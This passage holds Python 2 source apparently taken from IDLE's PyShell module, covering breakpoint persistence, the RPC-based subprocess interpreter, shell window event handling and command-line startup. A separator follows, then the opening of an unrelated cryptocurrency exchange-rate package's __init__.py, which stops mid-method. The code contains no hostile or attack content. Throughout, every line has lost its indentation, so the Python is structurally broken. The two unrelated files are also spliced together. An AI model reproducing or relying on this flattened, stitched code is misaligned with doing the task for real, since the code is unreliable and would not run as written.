lines = open(self.breakpointPath,"r").readlines()
except IOError:
lines = []
new_file = open(self.breakpointPath,"w")
for line in lines:
if not line.startswith(filename + '='):
new_file.write(line)
self.update_breakpoints()
breaks = self.breakpoints
if breaks:
new_file.write(filename + '=' + str(breaks) + '\n')
new_file.close()
def restore_file_breaks(self):
self.text.update() # this enables setting "BREAK" tags to be visible
filename = self.io.filename
if filename is None:
return
if os.path.isfile(self.breakpointPath):
lines = open(self.breakpointPath,"r").readlines()
for line in lines:
if line.startswith(filename + '='):
breakpoint_linenumbers = eval(line[len(filename)+1:])
for breakpoint_linenumber in breakpoint_linenumbers:
self.set_breakpoint(breakpoint_linenumber)
def update_breakpoints(self):
"Retrieves all the breakpoints in the current window"
text = self.text
ranges = text.tag_ranges("BREAK")
linenumber_list = self.ranges_to_linenumbers(ranges)
self.breakpoints = linenumber_list
def ranges_to_linenumbers(self, ranges):
lines = []
for index in range(0, len(ranges), 2):
lineno = int(float(ranges[index]))
end = int(float(ranges[index+1]))
while lineno < end:
lines.append(lineno)
lineno += 1
return lines
# XXX 13 Dec 2002 KBK Not used currently
# def saved_change_hook(self):
# "Extend base method - clear breaks if module is modified"
# if not self.get_saved():
# self.clear_file_breaks()
# EditorWindow.saved_change_hook(self)
def _close(self):
"Extend base method - clear breaks when module is closed"
self.clear_file_breaks()
EditorWindow._close(self)
class PyShellFileList(FileList):
"Extend base class: IDLE supports a shell and breakpoints"
# override FileList's class variable, instances return PyShellEditorWindow
# instead of EditorWindow when new edit windows are created.
EditorWindow = PyShellEditorWindow
pyshell = None
def open_shell(self, event=None):
if self.pyshell:
self.pyshell.top.wakeup()
else:
self.pyshell = PyShell(self)
if self.pyshell:
if not self.pyshell.begin():
return None
return self.pyshell
class ModifiedColorDelegator(ColorDelegator):
"Extend base class: colorizer for the shell window itself"
def __init__(self):
ColorDelegator.__init__(self)
self.LoadTagDefs()
def recolorize_main(self):
self.tag_remove("TODO", "1.0", "iomark")
self.tag_add("SYNC", "1.0", "iomark")
ColorDelegator.recolorize_main(self)
def LoadTagDefs(self):
ColorDelegator.LoadTagDefs(self)
theme = idleConf.GetOption('main','Theme','name')
self.tagdefs.update({
"stdin": {'background':None,'foreground':None},
"stdout": idleConf.GetHighlight(theme, "stdout"),
"stderr": idleConf.GetHighlight(theme, "stderr"),
"console": idleConf.GetHighlight(theme, "console"),
})
class ModifiedUndoDelegator(UndoDelegator):
"Extend base class: forbid insert/delete before the I/O mark"
def insert(self, index, chars, tags=None):
try:
if self.delegate.compare(index, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.insert(self, index, chars, tags)
def delete(self, index1, index2=None):
try:
if self.delegate.compare(index1, "<", "iomark"):
self.delegate.bell()
return
except TclError:
pass
UndoDelegator.delete(self, index1, index2)
class MyRPCClient(rpc.RPCClient):
def handle_EOF(self):
"Override the base class - just re-raise EOFError"
raise EOFError
class ModifiedInterpreter(InteractiveInterpreter):
def __init__(self, tkconsole):
self.tkconsole = tkconsole
locals = sys.modules['__main__'].__dict__
InteractiveInterpreter.__init__(self, locals=locals)
self.save_warnings_filters = None
self.restarting = False
self.subprocess_arglist = self.build_subprocess_arglist()
port = 8833
rpcclt = None
rpcpid = None
def spawn_subprocess(self):
args = self.subprocess_arglist
self.rpcpid = os.spawnv(os.P_NOWAIT, sys.executable, args)
def build_subprocess_arglist(self):
w = ['-W' + s for s in sys.warnoptions]
if 1/2 > 0: # account for new division
w.append('-Qnew')
# Maybe IDLE is installed and is being accessed via sys.path,
# or maybe it's not installed and the idle.py script is being
# run from the IDLE source directory.
del_exitf = idleConf.GetOption('main', 'General', 'delete-exitfunc',
default=False, type='bool')
if __name__ == 'idlelib.PyShell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
if sys.platform[:3] == 'win' and ' ' in sys.executable:
# handle embedded space in path by quoting the argument
decorated_exec = '"%s"' % sys.executable
else:
decorated_exec = sys.executable
return [decorated_exec] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
# spawning first avoids passing a listening socket to the subprocess
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
addr = (LOCALHOST, self.port)
# Idle starts listening for connection on localhost
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except socket.error, err:
pass
else:
self.display_port_binding_error()
return None
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.rpcclt.register("stdin", self.tkconsole)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path()
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
RemoteDebugger.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.unix_terminate()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout, err:
self.display_no_subprocess_error()
return None
self.transfer_path()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
if was_executing:
console.write('\n')
console.showprompt()
halfbar = ((int(console.width) - 16) // 2) * '='
console.write(halfbar + ' RESTART ' + halfbar)
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
gui = RemoteDebugger.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.unix_terminate()
self.tkconsole.executing = False
self.rpcclt = None
def unix_terminate(self):
"UNIX: make sure subprocess is terminated and collect status"
if hasattr(os, 'kill'):
try:
os.kill(self.rpcpid, SIGTERM)
except OSError:
# process already terminated:
return
else:
try:
os.waitpid(self.rpcpid, 0)
except OSError:
return
def transfer_path(self):
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (sys.path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, IOError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print >>console, repr(what)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "PyShell.ModifiedInterpreter: Subprocess ERROR:\n"
print >>sys.__stderr__, errmsg, what
print >>console, errmsg, what
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self.tkconsole.text.after(self.tkconsole.pollinterval,
self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
        static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
import RemoteObjectBrowser
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = RemoteObjectBrowser.StubObjectTreeItem(self.rpcclt, oid)
from TreeWidget import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.GetOption('main','Theme','name')
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
source = open(filename, "r").read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
tkerr = self.tkconsole.stderr
print>>tkerr, '*** Error in script or command!\n'
print>>tkerr, 'Traceback (most recent call last):'
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
if isinstance(source, types.UnicodeType):
import IOBinding
try:
source = source.encode(IOBinding.encoding)
except UnicodeError:
self.tkconsole.resetoutput()
self.write("Unsupported characters in input\n")
return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
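        # linecache.cache entries are (size, mtime, lines, fullname) tuples, so
        # tracebacks can display the exact source typed into the shell; the
        # extended_linecache_checkcache() patch above keeps these synthetic
        # "<pyshell#N>" entries from being purged.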
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Extend base class method: Add Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
text = self.tkconsole.text
stuff = self.unpackerror()
if stuff:
msg, lineno, offset, line = stuff
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
text.tag_add("ERROR", pos)
text.see(pos)
char = text.get(pos)
if char and char in IDENTCHARS:
text.tag_add("ERROR", pos + " wordstart", pos)
self.tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % str(msg))
else:
self.tkconsole.resetoutput()
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
def unpackerror(self):
type, value, tb = sys.exc_info()
ok = type is SyntaxError
if ok:
try:
msg, (dummy_filename, lineno, offset, line) = value
if not offset:
offset = 0
except:
ok = 0
if ok:
return msg, lineno, offset, line
else:
return None
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in c.keys():
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec code in self.locals
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec code in self.locals
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
master=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print >>self.tkconsole.stderr, \
"IDLE internal error in runcode()"
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print >>self.tkconsole.stderr, "KeyboardInterrupt"
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind TCP/IP port 8833, which is necessary to "
"communicate with its Python execution server. Either "
"no networking is installed on this computer or another "
"process (another IDLE?) is using the port. Run IDLE with the -n "
"command line switch to start without a subprocess and refer to "
"Help/IDLE Help 'Running without a subprocess' for further "
"details.",
master=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
master=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
master=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Windows"),
("help", "_Help"),
]
if macosxSupport.runningAsOSXApp():
del menu_specs[-3]
menu_specs[-2] = ("windows", "_Window")
# New classes
from IdleHistory import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
import IOBinding
self.stdout = PseudoFile(self, "stdout", IOBinding.encoding)
self.stderr = PseudoFile(self, "stderr", IOBinding.encoding)
self.console = PseudoFile(self, "console", IOBinding.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
master=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
RemoteDebugger.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = RemoteDebugger.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = Debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"The program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
if self.reading:
self.top.quit()
self.canceled = True
self.closing = True
# Wait for poll_subprocess() rescheduling to stop
self.text.after(2 * self.pollinterval, self.close2)
def close2(self):
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
firewallmessage = """
****************************************************************
Personal firewall software may warn about the connection IDLE
makes to its subprocess using this computer's internal loopback
interface. This connection is not visible on any external
interface and no data is sent to or received from the Internet.
****************************************************************
"""
def begin(self):
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = "==== No Subprocess ===="
self.write("Python %s on %s\n%s\n%s\nIDLE %s %s\n" %
(sys.version, sys.platform, self.COPYRIGHT,
self.firewallmessage, idlever.IDLE_VERSION, nosub))
self.showprompt()
import Tkinter
Tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
if isinstance(line, unicode):
import IOBinding
try:
line = line.encode(IOBinding.encoding)
except UnicodeError:
pass
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
        # (but only if this is before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop() in raw_input()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
more = self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
master=self.text)
return
from StackViewer import StackBrowser
sv = StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
self.interp.restart_subprocess()
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.history_store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
sys.stdout.softspace = 0
def write(self, s, tags=()):
try:
self.text.mark_gravity("iomark", "right")
OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
pass
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
class PseudoFile(object):
def __init__(self, shell, tags, encoding=None):
self.shell = shell
self.tags = tags
self.softspace = 0
self.encoding = encoding
def write(self, s):
self.shell.write(s, self.tags)
def writelines(self, l):
map(self.write, l)
def flush(self):
pass
def isatty(self):
return True
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print sys.argv" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print sys.argv" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
global flist, root, use_subprocess
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error, msg:
sys.stderr.write("Error: %s\n" % str(msg))
sys.stderr.write(usage_msg)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print "No script file: ", script
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if not dir in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not edit_start
# start editor and/or shell windows:
root = Tk(className="Idle")
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
macosxSupport.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args:
flist.open(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosxSupport.runningAsOSXApp() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
shell = flist.pyshell
# handle remaining options:
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if shell and cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
root.mainloop()
root.destroy()
if __name__ == "__main__":
sys.modules['PyShell'] = sys.modules['__main__']
main()
|
__init__.py
|
"""
iota-exrate-manager
Python package that keeps track of iota exchange rates via various APIs and converts prices
"""
__version__ = "0.1.2"
__author__ = 'F-Node-Karlsruhe'
from .apis import coingecko, cmc
from datetime import datetime, timedelta
import sched
import time
import warnings
import threading
SUPPORTED_CURRENCIES = {'usd', 'eur', 'gbp', 'jpy', 'chf', 'cad'}
class ExRateManager:
_ex_rates = {}
_apis = {'coinmarketcap', 'coingecko'}
_last_updated = None
"""Create a ExRateManager.
:param refresh_rate: Refresh rate in seconds.
Default 300
    :param delay_threshold: Number of refresh intervals that may pass without a
        successful update before a warning is emitted.
Default 3
    :param currencies: List of fiat currencies for which iota quotes are fetched.
Default ['usd']
:param cmc_api_key: The coinmarketcap API key to fetch the cmc API.
Default None
"""
def __init__(self,
refresh_rate=300,
delay_threshold=3,
currencies=['usd'],
cmc_api_key=None):
for currency in currencies:
if currency not in SUPPORTED_CURRENCIES:
raise Exception('Currency %s not supported' % currency)
self._currencies = currencies
if cmc_api_key is None:
self._apis.remove('coinmarketcap')
else:
self._cmc_api_key = cmc_api_key
self._scheduler = sched.scheduler(time.time, time.sleep)
self._refresh_rate = refresh_rate
self._delay_threshold = delay_threshold
        # run refresh as a daemon thread
thread = threading.Thread(target=self.__refresh)
thread.daemon = True
thread.start()
def __refresh(self):
